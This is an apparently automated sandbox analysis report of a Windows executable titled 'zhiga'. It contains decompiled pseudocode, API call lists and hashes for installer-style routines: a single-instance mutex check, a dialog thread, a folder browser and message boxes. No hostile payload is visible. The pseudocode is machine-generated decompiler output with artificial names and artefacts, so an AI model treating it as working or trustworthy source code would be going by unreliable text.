                                                          							} else {
                                                          								_t64 = 0x520;
                                                          								L32:
                                                          								E010C44B9(0, _t64, 0, 0, 0x10, 0);
                                                          								goto L33;
                                                          							}
                                                          						} else {
                                                          							_t64 =  &_v268;
                                                          							if(E010C468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                          								goto L3;
                                                          							} else {
                                                          								_t43 = CreateMutexA(0, 1,  &_v268);
                                                          								 *0x10c8588 = _t43;
                                                          								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                          									goto L12;
                                                          								} else {
                                                          									if(( *0x10c9a34 & 0x00000080) == 0) {
                                                          										_t64 = 0x524;
                                                          										if(E010C44B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                          											goto L12;
                                                          										} else {
                                                          											goto L11;
                                                          										}
                                                          									} else {
                                                          										_t64 = 0x54b;
                                                          										E010C44B9(0, 0x54b, "zhiga", 0, 0x10, 0);
                                                          										L11:
                                                          										CloseHandle( *0x10c8588);
                                                          										 *0x10c9124 = 0x800700b7;
                                                          										goto L33;
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          					} else {
                                                          						L3:
                                                          						_t64 = 0x4b1;
                                                          						E010C44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                          						 *0x10c9124 = 0x80070714;
                                                          						L33:
                                                          						_t23 = 0;
                                                          					}
                                                          				}
                                                          				return E010C6CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                          			}



















                                                          0x010c2cb5
                                                          0x010c2cbc
                                                          0x010c2cc7
                                                          0x010c2cc9
                                                          0x010c2cd1
                                                          0x010c2cd3
                                                          0x010c2cd9
                                                          0x010c2ce9
                                                          0x010c2cf9
                                                          0x010c2d0e
                                                          0x010c2d15
                                                          0x010c2d1c
                                                          0x010c2ef3
                                                          0x00000000
                                                          0x010c2d2d
                                                          0x010c2d34
                                                          0x010c2d3b
                                                          0x010c2d40
                                                          0x010c2d48
                                                          0x010c2d59
                                                          0x010c2d84
                                                          0x010c2e1f
                                                          0x010c2e1f
                                                          0x010c2e2e
                                                          0x010c2e41
                                                          0x010c2e5a
                                                          0x010c2e62
                                                          0x010c2e6c
                                                          0x010c2e6c
                                                          0x010c2e75
                                                          0x010c2e77
                                                          0x010c2e77
                                                          0x010c2e84
                                                          0x010c2e8b
                                                          0x010c2e94
                                                          0x00000000
                                                          0x010c2e96
                                                          0x010c2e96
                                                          0x010c2e9e
                                                          0x010c2ea2
                                                          0x010c2eba
                                                          0x00000000
                                                          0x010c2ece
                                                          0x010c2ede
                                                          0x010c2eed
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010c2eed
                                                          0x010c2eef
                                                          0x010c2eef
                                                          0x010c2eef
                                                          0x010c2eef
                                                          0x010c2ea2
                                                          0x010c2e86
                                                          0x010c2e88
                                                          0x010c2e88
                                                          0x010c2e43
                                                          0x010c2e48
                                                          0x00000000
                                                          0x010c2e48
                                                          0x010c2e30
                                                          0x010c2e30
                                                          0x010c2ef8
                                                          0x010c2f01
                                                          0x00000000
                                                          0x010c2f01
                                                          0x010c2d8a
                                                          0x010c2d8f
                                                          0x010c2da1
                                                          0x00000000
                                                          0x010c2da3
                                                          0x010c2dae
                                                          0x010c2db4
                                                          0x010c2dbb
                                                          0x00000000
                                                          0x010c2dca
                                                          0x010c2dd3
                                                          0x010c2df5
                                                          0x010c2e02
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010c2dd5
                                                          0x010c2dde
                                                          0x010c2de3
                                                          0x010c2e04
                                                          0x010c2e0a
                                                          0x010c2e10
                                                          0x00000000
                                                          0x010c2e10
                                                          0x010c2dd3
                                                          0x010c2dbb
                                                          0x010c2da1
                                                          0x010c2d5b
                                                          0x010c2d5b
                                                          0x010c2d5d
                                                          0x010c2d69
                                                          0x010c2d6e
                                                          0x010c2f06
                                                          0x010c2f06
                                                          0x010c2f06
                                                          0x010c2d59
                                                          0x010c2f18

                                                          APIs
                                                          • memset.MSVCRT ref: 010C2CD9
                                                          • memset.MSVCRT ref: 010C2CE9
                                                          • memset.MSVCRT ref: 010C2CF9
                                                            • Part of subcall function 010C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010C46A0
                                                            • Part of subcall function 010C468F: SizeofResource.KERNEL32(00000000,00000000,?,010C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46A9
                                                            • Part of subcall function 010C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010C46C3
                                                            • Part of subcall function 010C468F: LoadResource.KERNEL32(00000000,00000000,?,010C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46CC
                                                            • Part of subcall function 010C468F: LockResource.KERNEL32(00000000,?,010C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46D3
                                                            • Part of subcall function 010C468F: memcpy_s.MSVCRT ref: 010C46E5
                                                            • Part of subcall function 010C468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46EF
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010C2D34
                                                          • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 010C2D40
                                                          • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 010C2DAE
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 010C2DBD
                                                          • CloseHandle.KERNEL32(zhiga,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 010C2E0A
                                                            • Part of subcall function 010C44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010C4518
                                                            • Part of subcall function 010C44B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 010C4554
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                          • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$zhiga
                                                          • API String ID: 1002816675-3407794480
                                                          • Opcode ID: ea1eacd231076c7758d278cc00a7844bcc15acbdeea705f5a4d8112d676d0901
                                                          • Instruction ID: d4ba119012d222fd10c3ddb144f2bfe42bfdfe3be71e94332e7881c58a002502
                                                          • Opcode Fuzzy Hash: ea1eacd231076c7758d278cc00a7844bcc15acbdeea705f5a4d8112d676d0901
                                                          • Instruction Fuzzy Hash: 2151C570340306AEF770A7299C49B7F36D9EB95F44F00806DAAC1E69C9EAB9C4418F65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 81%
                                                          			E010C34F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                          				void* _t9;
                                                          				void* _t12;
                                                          				void* _t13;
                                                          				void* _t17;
                                                          				void* _t23;
                                                          				void* _t25;
                                                          				struct HWND__* _t35;
                                                          				struct HWND__* _t38;
                                                          				void* _t39;
                                                          
                                                          				_t9 = _a8 - 0x10;
                                                          				if(_t9 == 0) {
                                                          					__eflags = 1;
                                                          					L19:
                                                          					_push(0);
                                                          					 *0x10c91d8 = 1;
                                                          					L20:
                                                          					_push(_a4);
                                                          					L21:
                                                          					EndDialog();
                                                          					L22:
                                                          					return 1;
                                                          				}
                                                          				_push(1);
                                                          				_pop(1);
                                                          				_t12 = _t9 - 0xf2;
                                                          				if(_t12 == 0) {
                                                          					__eflags = _a12 - 0x1b;
                                                          					if(_a12 != 0x1b) {
                                                          						goto L22;
                                                          					}
                                                          					goto L19;
                                                          				}
                                                          				_t13 = _t12 - 0xe;
                                                          				if(_t13 == 0) {
                                                          					_t35 = _a4;
                                                          					 *0x10c8584 = _t35;
                                                          					E010C43D0(_t35, GetDesktopWindow());
                                                          					__eflags =  *0x10c8184; // 0x1
                                                          					if(__eflags != 0) {
                                                          						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                          						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                          					}
                                                          					SetWindowTextA(_t35, "zhiga");
                                                          					_t17 = CreateThread(0, 0, E010C4FE0, 0, 0, 0x10c8798);
                                                          					 *0x10c879c = _t17;
                                                          					__eflags = _t17;
                                                          					if(_t17 != 0) {
                                                          						goto L22;
                                                          					} else {
                                                          						E010C44B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                          						_push(0);
                                                          						_push(_t35);
                                                          						goto L21;
                                                          					}
                                                          				}
                                                          				_t23 = _t13 - 1;
                                                          				if(_t23 == 0) {
                                                          					__eflags = _a12 - 2;
                                                          					if(_a12 != 2) {
                                                          						goto L22;
                                                          					}
                                                          					ResetEvent( *0x10c858c);
                                                          					_t38 =  *0x10c8584; // 0x0
                                                          					_t25 = E010C44B9(_t38, 0x4b2, 0x10c1140, 0, 0x20, 4);
                                                          					__eflags = _t25 - 6;
                                                          					if(_t25 == 6) {
                                                          						L11:
                                                          						 *0x10c91d8 = 1;
                                                          						SetEvent( *0x10c858c);
                                                          						_t39 =  *0x10c879c; // 0x0
                                                          						E010C3680(_t39);
                                                          						_push(0);
                                                          						goto L20;
                                                          					}
                                                          					__eflags = _t25 - 1;
                                                          					if(_t25 == 1) {
                                                          						goto L11;
                                                          					}
                                                          					SetEvent( *0x10c858c);
                                                          					goto L22;
                                                          				}
                                                          				if(_t23 == 0xe90) {
                                                          					TerminateThread( *0x10c879c, 0);
                                                          					EndDialog(_a4, _a12);
                                                          					return 1;
                                                          				}
                                                          				return 0;
                                                          			}












                                                          0x010c34fb
                                                          0x010c34fe
                                                          0x010c3665
                                                          0x010c3666
                                                          0x010c3666
                                                          0x010c3668
                                                          0x010c366e
                                                          0x010c366e
                                                          0x010c3671
                                                          0x010c3671
                                                          0x010c3677
                                                          0x00000000
                                                          0x010c3677
                                                          0x010c3504
                                                          0x010c3506
                                                          0x010c3507
                                                          0x010c350c
                                                          0x010c365b
                                                          0x010c365f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010c3661
                                                          0x010c3512
                                                          0x010c3515
                                                          0x010c35be
                                                          0x010c35c1
                                                          0x010c35d1
                                                          0x010c35d8
                                                          0x010c35de
                                                          0x010c35f8
                                                          0x010c3617
                                                          0x010c3617
                                                          0x010c3623
                                                          0x010c3637
                                                          0x010c363d
                                                          0x010c3642
                                                          0x010c3644
                                                          0x00000000
                                                          0x010c3646
                                                          0x010c3652
                                                          0x010c3657
                                                          0x010c3658
                                                          0x00000000
                                                          0x010c3658
                                                          0x010c3644
                                                          0x010c351b
                                                          0x010c351d
                                                          0x010c354f
                                                          0x010c3553
                                                          0x00000000
                                                          0x00000000
                                                          0x010c355f
                                                          0x010c3565
                                                          0x010c357c
                                                          0x010c3581
                                                          0x010c3584
                                                          0x010c359b
                                                          0x010c35a1
                                                          0x010c35a7
                                                          0x010c35ad
                                                          0x010c35b3
                                                          0x010c35b8
                                                          0x00000000
                                                          0x010c35b8
                                                          0x010c3586
                                                          0x010c3588
                                                          0x00000000
                                                          0x00000000
                                                          0x010c3590
                                                          0x00000000
                                                          0x010c3590
                                                          0x010c3524
                                                          0x010c3535
                                                          0x010c3541
                                                          0x00000000
                                                          0x010c3549
                                                          0x00000000

                                                          APIs
                                                          • TerminateThread.KERNEL32(00000000), ref: 010C3535
                                                          • EndDialog.USER32(?,?), ref: 010C3541
                                                          • ResetEvent.KERNEL32 ref: 010C355F
                                                          • SetEvent.KERNEL32(010C1140,00000000,00000020,00000004), ref: 010C3590
                                                          • GetDesktopWindow.USER32 ref: 010C35C7
                                                          • GetDlgItem.USER32(?,0000083B), ref: 010C35F1
                                                          • SendMessageA.USER32(00000000), ref: 010C35F8
                                                          • GetDlgItem.USER32(?,0000083B), ref: 010C3610
                                                          • SendMessageA.USER32(00000000), ref: 010C3617
                                                          • SetWindowTextA.USER32(?,zhiga), ref: 010C3623
                                                          • CreateThread.KERNEL32 ref: 010C3637
                                                          • EndDialog.USER32(?,00000000), ref: 010C3671
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                          • String ID: zhiga
                                                          • API String ID: 2406144884-3705506974
                                                          • Opcode ID: d5c39190ebb41a4173f1d53cd3001b25b6bf0282d9d188659eee94f3e23abfa0
                                                          • Instruction ID: 05f13cb7070648ee35aa3a4d038e1e0db13609c6a62e7f7e088e52581358a170
                                                          • Opcode Fuzzy Hash: d5c39190ebb41a4173f1d53cd3001b25b6bf0282d9d188659eee94f3e23abfa0
                                                          • Instruction Fuzzy Hash: F1319031250215EFD7701B29AC4DE2E7EA9F7D9F45F10C51EFAC29A298DA7A8400CF54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 50%
                                                          			E010C4224(char __ecx) {
                                                          				char* _v8;
                                                          				_Unknown_base(*)()* _v12;
                                                          				_Unknown_base(*)()* _v16;
                                                          				_Unknown_base(*)()* _v20;
                                                          				char* _v28;
                                                          				intOrPtr _v32;
                                                          				intOrPtr _v36;
                                                          				intOrPtr _v40;
                                                          				char _v44;
                                                          				char _v48;
                                                          				char _v52;
                                                          				_Unknown_base(*)()* _t26;
                                                          				_Unknown_base(*)()* _t28;
                                                          				_Unknown_base(*)()* _t29;
                                                          				_Unknown_base(*)()* _t32;
                                                          				char _t42;
                                                          				char* _t44;
                                                          				char* _t61;
                                                          				void* _t63;
                                                          				char* _t65;
                                                          				struct HINSTANCE__* _t66;
                                                          				char _t67;
                                                          				void* _t71;
                                                          				char _t76;
                                                          				intOrPtr _t85;
                                                          
                                                          				_t67 = __ecx;
                                                          				_t66 = LoadLibraryA("SHELL32.DLL");
                                                          				if(_t66 == 0) {
                                                          					_t63 = 0x4c2;
                                                          					L22:
                                                          					E010C44B9(_t67, _t63, 0, 0, 0x10, 0);
                                                          					return 0;
                                                          				}
                                                          				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                          				_v12 = _t26;
                                                          				if(_t26 == 0) {
                                                          					L20:
                                                          					FreeLibrary(_t66);
                                                          					_t63 = 0x4c1;
                                                          					goto L22;
                                                          				}
                                                          				_t28 = GetProcAddress(_t66, 0xc3);
                                                          				_v20 = _t28;
                                                          				if(_t28 == 0) {
                                                          					goto L20;
                                                          				}
                                                          				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                          				_v16 = _t29;
                                                          				if(_t29 == 0) {
                                                          					goto L20;
                                                          				}
                                                          				_t76 =  *0x10c88c0; // 0x0
                                                          				if(_t76 != 0) {
                                                          					L10:
                                                          					 *0x10c87a0 = 0;
                                                          					_v52 = _t67;
                                                          					_v48 = 0;
                                                          					_v44 = 0;
                                                          					_v40 = 0x10c8598;
                                                          					_v36 = 1;
                                                          					_v32 = E010C4200;
                                                          					_v28 = 0x10c88c0;
                                                          					 *0x10ca288( &_v52);
                                                          					_t32 =  *_v12();
                                                          					if(_t71 != _t71) {
                                                          						asm("int 0x29");
                                                          					}
                                                          					_v12 = _t32;
                                                          					if(_t32 != 0) {
                                                          						 *0x10ca288(_t32, 0x10c88c0);
                                                          						 *_v16();
                                                          						if(_t71 != _t71) {
                                                          							asm("int 0x29");
                                                          						}
                                                          						if( *0x10c88c0 != 0) {
                                                          							E010C1680(0x10c87a0, 0x104, 0x10c88c0);
                                                          						}
                                                          						 *0x10ca288(_v12);
                                                          						 *_v20();
                                                          						if(_t71 != _t71) {
                                                          							asm("int 0x29");
                                                          						}
                                                          					}
                                                          					FreeLibrary(_t66);
                                                          					_t85 =  *0x10c87a0; // 0x0
                                                          					return 0 | _t85 != 0x00000000;
                                                          				} else {
                                                          					GetTempPathA(0x104, 0x10c88c0);
                                                          					_t61 = 0x10c88c0;
                                                          					_t4 =  &(_t61[1]); // 0x10c88c1
                                                          					_t65 = _t4;
                                                          					do {
                                                          						_t42 =  *_t61;
                                                          						_t61 =  &(_t61[1]);
                                                          					} while (_t42 != 0);
                                                          					_t5 = _t61 - _t65 + 0x10c88c0; // 0x2191181
                                                          					_t44 = CharPrevA(0x10c88c0, _t5);
                                                          					_v8 = _t44;
                                                          					if( *_t44 == 0x5c &&  *(CharPrevA(0x10c88c0, _t44)) != 0x3a) {
                                                          						 *_v8 = 0;
                                                          					}
                                                          					goto L10;
                                                          				}
                                                          			}




























                                                          0x010c4234
                                                          0x010c423c
                                                          0x010c4240
                                                          0x010c43b2
                                                          0x010c43b7
                                                          0x010c43c0
                                                          0x00000000
                                                          0x010c43c5
                                                          0x010c424c
                                                          0x010c4252
                                                          0x010c4257
                                                          0x010c43a4
                                                          0x010c43a5
                                                          0x010c43ab
                                                          0x00000000
                                                          0x010c43ab
                                                          0x010c4263
                                                          0x010c4269
                                                          0x010c426e
                                                          0x00000000
                                                          0x00000000
                                                          0x010c427a
                                                          0x010c4280
                                                          0x010c4285
                                                          0x00000000
                                                          0x00000000
                                                          0x010c428d
                                                          0x010c4293
                                                          0x010c42e6
                                                          0x010c42e9
                                                          0x010c42ef
                                                          0x010c42f4
                                                          0x010c42f7
                                                          0x010c4300
                                                          0x010c4307
                                                          0x010c430e
                                                          0x010c4315
                                                          0x010c431c
                                                          0x010c4322
                                                          0x010c4326
                                                          0x010c432d
                                                          0x010c432d
                                                          0x010c432f
                                                          0x010c4334
                                                          0x010c4343
                                                          0x010c4349
                                                          0x010c434d
                                                          0x010c4354
                                                          0x010c4354
                                                          0x010c435d
                                                          0x010c436e
                                                          0x010c436e
                                                          0x010c437d
                                                          0x010c4383
                                                          0x010c4387
                                                          0x010c438e
                                                          0x010c438e
                                                          0x010c4387
                                                          0x010c4391
                                                          0x010c4399
                                                          0x00000000
                                                          0x010c4295
                                                          0x010c429f
                                                          0x010c42a5
                                                          0x010c42aa
                                                          0x010c42aa
                                                          0x010c42ad
                                                          0x010c42ad
                                                          0x010c42af
                                                          0x010c42b0
                                                          0x010c42b6
                                                          0x010c42c2
                                                          0x010c42c8
                                                          0x010c42ce
                                                          0x010c42e4
                                                          0x010c42e4
                                                          0x00000000
                                                          0x010c42ce

                                                          APIs
                                                          • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 010C4236
                                                          • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 010C424C
                                                          • GetProcAddress.KERNEL32(00000000,000000C3), ref: 010C4263
                                                          • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 010C427A
                                                          • GetTempPathA.KERNEL32(00000104,010C88C0,?,00000001), ref: 010C429F
                                                          • CharPrevA.USER32(010C88C0,02191181,?,00000001), ref: 010C42C2
                                                          • CharPrevA.USER32(010C88C0,00000000,?,00000001), ref: 010C42D6
                                                          • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 010C4391
                                                          • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 010C43A5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                          • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                          • API String ID: 1865808269-1731843650
                                                          • Opcode ID: 377cbb253d8c0c442b48c58e1bf01aada8ea1b1b67df50a5c11cc9f4d6df9d39
                                                          • Instruction ID: 59c3760a46d83dae314afec3ffdfd6282110035ccd7605934ccde757a4383d19
                                                          • Opcode Fuzzy Hash: 377cbb253d8c0c442b48c58e1bf01aada8ea1b1b67df50a5c11cc9f4d6df9d39
                                                          • Instruction Fuzzy Hash: 4A411774A00214EFE7219F79E8989AE7FB5FB84B44F04819EE9C1E7245D77A8804CF64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 94%
                                                          			E010C44B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                          				signed int _v8;
                                                          				char _v64;
                                                          				char _v576;
                                                          				void* _v580;
                                                          				struct HWND__* _v584;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t34;
                                                          				void* _t37;
                                                          				signed int _t39;
                                                          				intOrPtr _t43;
                                                          				signed int _t44;
                                                          				signed int _t49;
                                                          				signed int _t52;
                                                          				void* _t54;
                                                          				intOrPtr _t55;
                                                          				intOrPtr _t58;
                                                          				intOrPtr _t59;
                                                          				int _t64;
                                                          				void* _t66;
                                                          				intOrPtr* _t67;
                                                          				signed int _t69;
                                                          				intOrPtr* _t73;
                                                          				intOrPtr* _t76;
                                                          				intOrPtr* _t77;
                                                          				void* _t80;
                                                          				void* _t81;
                                                          				void* _t82;
                                                          				intOrPtr* _t84;
                                                          				void* _t85;
                                                          				signed int _t89;
                                                          
                                                          				_t75 = __edx;
                                                          				_t34 =  *0x10c8004; // 0x4b13cf70
                                                          				_v8 = _t34 ^ _t89;
                                                          				_v584 = __ecx;
                                                          				_t83 = "LoadString() Error.  Could not load string resource.";
                                                          				_t67 = _a4;
                                                          				_t69 = 0xd;
                                                          				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                          				_t80 = _t83 + _t69 + _t69;
                                                          				_v580 = _t37;
                                                          				asm("movsb");
                                                          				if(( *0x10c8a38 & 0x00000001) != 0) {
                                                          					_t39 = 1;
                                                          				} else {
                                                          					_v576 = 0;
                                                          					LoadStringA( *0x10c9a3c, _t75,  &_v576, 0x200);
                                                          					if(_v576 != 0) {
                                                          						_t73 =  &_v576;
                                                          						_t16 = _t73 + 1; // 0x1
                                                          						_t75 = _t16;
                                                          						do {
                                                          							_t43 =  *_t73;
                                                          							_t73 = _t73 + 1;
                                                          						} while (_t43 != 0);
                                                          						_t84 = _v580;
                                                          						_t74 = _t73 - _t75;
                                                          						if(_t84 == 0) {
                                                          							if(_t67 == 0) {
                                                          								_t27 = _t74 + 1; // 0x2
                                                          								_t83 = _t27;
                                                          								_t44 = LocalAlloc(0x40, _t83);
                                                          								_t80 = _t44;
                                                          								if(_t80 == 0) {
                                                          									goto L6;
                                                          								} else {
                                                          									_t75 = _t83;
                                                          									_t74 = _t80;
                                                          									E010C1680(_t80, _t83,  &_v576);
                                                          									goto L23;
                                                          								}
                                                          							} else {
                                                          								_t76 = _t67;
                                                          								_t24 = _t76 + 1; // 0x1
                                                          								_t85 = _t24;
                                                          								do {
                                                          									_t55 =  *_t76;
                                                          									_t76 = _t76 + 1;
                                                          								} while (_t55 != 0);
                                                          								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                          								_t83 = _t25 + _t74;
                                                          								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                          								_t80 = _t44;
                                                          								if(_t80 == 0) {
                                                          									goto L6;
                                                          								} else {
                                                          									E010C171E(_t80, _t83,  &_v576, _t67);
                                                          									goto L23;
                                                          								}
                                                          							}
                                                          						} else {
                                                          							_t77 = _t67;
                                                          							_t18 = _t77 + 1; // 0x1
                                                          							_t81 = _t18;
                                                          							do {
                                                          								_t58 =  *_t77;
                                                          								_t77 = _t77 + 1;
                                                          							} while (_t58 != 0);
                                                          							_t75 = _t77 - _t81;
                                                          							_t82 = _t84 + 1;
                                                          							do {
                                                          								_t59 =  *_t84;
                                                          								_t84 = _t84 + 1;
                                                          							} while (_t59 != 0);
                                                          							_t21 = _t74 + 0x64; // 0x65
                                                          							_t83 = _t21 + _t84 - _t82 + _t75;
                                                          							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                          							_t80 = _t44;
                                                          							if(_t80 == 0) {
                                                          								goto L6;
                                                          							} else {
                                                          								_push(_v580);
                                                          								E010C171E(_t80, _t83,  &_v576, _t67);
                                                          								L23:
                                                          								MessageBeep(_a12);
                                                          								if(E010C681F(_t67) == 0) {
                                                          									L25:
                                                          									_t49 = 0x10000;
                                                          								} else {
                                                          									_t54 = E010C67C9(_t74, _t74);
                                                          									_t49 = 0x190000;
                                                          									if(_t54 == 0) {
                                                          										goto L25;
                                                          									}
                                                          								}
                                                          								_t52 = MessageBoxA(_v584, _t80, "zhiga", _t49 | _a12 | _a16);
                                                          								_t83 = _t52;
                                                          								LocalFree(_t80);
                                                          								_t39 = _t52;
                                                          							}
                                                          						}
                                                          					} else {
                                                          						if(E010C681F(_t67) == 0) {
                                                          							L4:
                                                          							_t64 = 0x10010;
                                                          						} else {
                                                          							_t66 = E010C67C9(0, 0);
                                                          							_t64 = 0x190010;
                                                          							if(_t66 == 0) {
                                                          								goto L4;
                                                          							}
                                                          						}
                                                          						_t44 = MessageBoxA(_v584,  &_v64, "zhiga", _t64);
                                                          						L6:
                                                          						_t39 = _t44 | 0xffffffff;
                                                          					}
                                                          				}
                                                          				return E010C6CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                          			}



































                                                          0x010c44b9
                                                          0x010c44c4
                                                          0x010c44cb
                                                          0x010c44d8
                                                          0x010c44e4
                                                          0x010c44eb
                                                          0x010c44ee
                                                          0x010c44ef
                                                          0x010c44ef
                                                          0x010c44f1
                                                          0x010c44f7
                                                          0x010c44f8
                                                          0x010c467b
                                                          0x010c44fe
                                                          0x010c4509
                                                          0x010c4518
                                                          0x010c4525
                                                          0x010c4562
                                                          0x010c4568
                                                          0x010c4568
                                                          0x010c456b
                                                          0x010c456b
                                                          0x010c456d
                                                          0x010c456e
                                                          0x010c4572
                                                          0x010c4578
                                                          0x010c457c
                                                          0x010c45cb
                                                          0x010c4607
                                                          0x010c4607
                                                          0x010c460d
                                                          0x010c4613
                                                          0x010c4617
                                                          0x00000000
                                                          0x010c461d
                                                          0x010c4623
                                                          0x010c4626
                                                          0x010c4628
                                                          0x00000000
                                                          0x010c4628
                                                          0x010c45cd
                                                          0x010c45cd
                                                          0x010c45cf
                                                          0x010c45cf
                                                          0x010c45d2
                                                          0x010c45d2
                                                          0x010c45d4
                                                          0x010c45d5
                                                          0x010c45db
                                                          0x010c45de
                                                          0x010c45e3
                                                          0x010c45e9
                                                          0x010c45ed
                                                          0x00000000
                                                          0x010c45f3
                                                          0x010c45fd
                                                          0x00000000
                                                          0x010c4602
                                                          0x010c45ed
                                                          0x010c457e
                                                          0x010c457e
                                                          0x010c4580
                                                          0x010c4580
                                                          0x010c4583
                                                          0x010c4583
                                                          0x010c4585
                                                          0x010c4586
                                                          0x010c458a
                                                          0x010c458c
                                                          0x010c458f
                                                          0x010c458f
                                                          0x010c4591
                                                          0x010c4592
                                                          0x010c459b
                                                          0x010c459e
                                                          0x010c45a3
                                                          0x010c45a9
                                                          0x010c45ad
                                                          0x00000000
                                                          0x010c45af
                                                          0x010c45af
                                                          0x010c45bf
                                                          0x010c462d
                                                          0x010c4630
                                                          0x010c463d
                                                          0x010c464e
                                                          0x010c464e
                                                          0x010c463f
                                                          0x010c4640
                                                          0x010c4647
                                                          0x010c464c
                                                          0x00000000
                                                          0x00000000
                                                          0x010c464c
                                                          0x010c4666
                                                          0x010c466d
                                                          0x010c466f
                                                          0x010c4675
                                                          0x010c4675
                                                          0x010c45ad
                                                          0x010c4527
                                                          0x010c452e
                                                          0x010c453f
                                                          0x010c453f
                                                          0x010c4530
                                                          0x010c4531
                                                          0x010c4538
                                                          0x010c453d
                                                          0x00000000
                                                          0x00000000
                                                          0x010c453d
                                                          0x010c4554
                                                          0x010c455a
                                                          0x010c455a
                                                          0x010c455a
                                                          0x010c4525
                                                          0x010c468c

                                                          APIs
                                                          • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010C4518
                                                          • MessageBoxA.USER32(?,?,zhiga,00010010), ref: 010C4554
